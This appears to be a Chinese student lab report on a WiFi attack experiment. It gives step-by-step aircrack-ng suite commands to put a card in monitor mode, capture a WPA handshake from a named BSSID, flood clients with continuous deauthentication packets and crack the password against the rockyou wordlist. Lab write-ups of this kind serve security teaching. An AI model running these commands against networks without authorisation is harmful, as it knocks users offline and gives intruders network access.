信息安全—WIFI攻击实验
过程视频详见 WIFI攻击视频
实验器材
1.kali linux 操作系统
2.VM 虚拟机
3.无线网卡
4.字典(kali自带字典)
详细设计
(1)实验设计
实验步骤与分析结果
1)Wi-Fi破解前期准备
①检查无线网卡的状态
使用命令“airmon-ng” ,检查无线网卡是否接入虚拟机
使用命令“iwconfig”,如图2查看无线网卡模式
②开启监控模式
使用命令“airmon-ng start wlan0”将网卡转为监听模式(命令后空格数字,数字表示监听的信道),见图3。
c.查看网卡模式
使用命令“iwconfig”,将系统配置无线网络设备或显示无线网络设备信息,如图4所示无线网卡监听模式启动成功mode值会变为monitor(监听模式)。
④ 扫描周围Wi-Fi
使用命令“airodump-ng wlan0mon”扫描附近的无线网络(ctrl+c停止)
其中显示的每一项含义见表1:
2)WPA加密攻击过程
① 获取网络状态信息
如图6所示使用命令“airodump-ng -c 1 --bssid F6:B7:B3:90:F1:28 -w~/Desktop/Wi-Fi/test.cap wlan0mon”,进行抓包。
其中显示的每一项含义见表2:
② 进行洪水攻击
使用命令“aireplay-ng -0 0 -a F6:B7:B3:90:F1:28 wlan0mon”进行洪水攻击,保持上面的窗口不要关闭,重新开一个窗口键入此命令。如图7,让当前路由下的所有连接断开。(0 表示不断攻击)
c. 跑包
使用命令“cd /usr/share/wordlists/ ”,进入特定的目录;
使用命令“ls”,默认显示的只有非隐藏文件的文件名、以文件名进行排序及文件名代表的颜色显示。当不加参数时,默认列出当前目录的列表信息。
使用命令“gzip –d rockyou.txt.gz”解压里面的rockyou.txt.gz
使用命令“ls”,找到rockyou.txt
具体流程见图8。
④ 开始攻击
使用命令“aircrack-ng -w /usr/share/wordlists/rockyou.txt test.cap-01.cap”进行攻击,其中“aircrack-ng -w”代表字典包位置,抓包生成的文件名.cap(跑字典解密),见图9。
⑤ 运行结果
已成功破解wifi密码
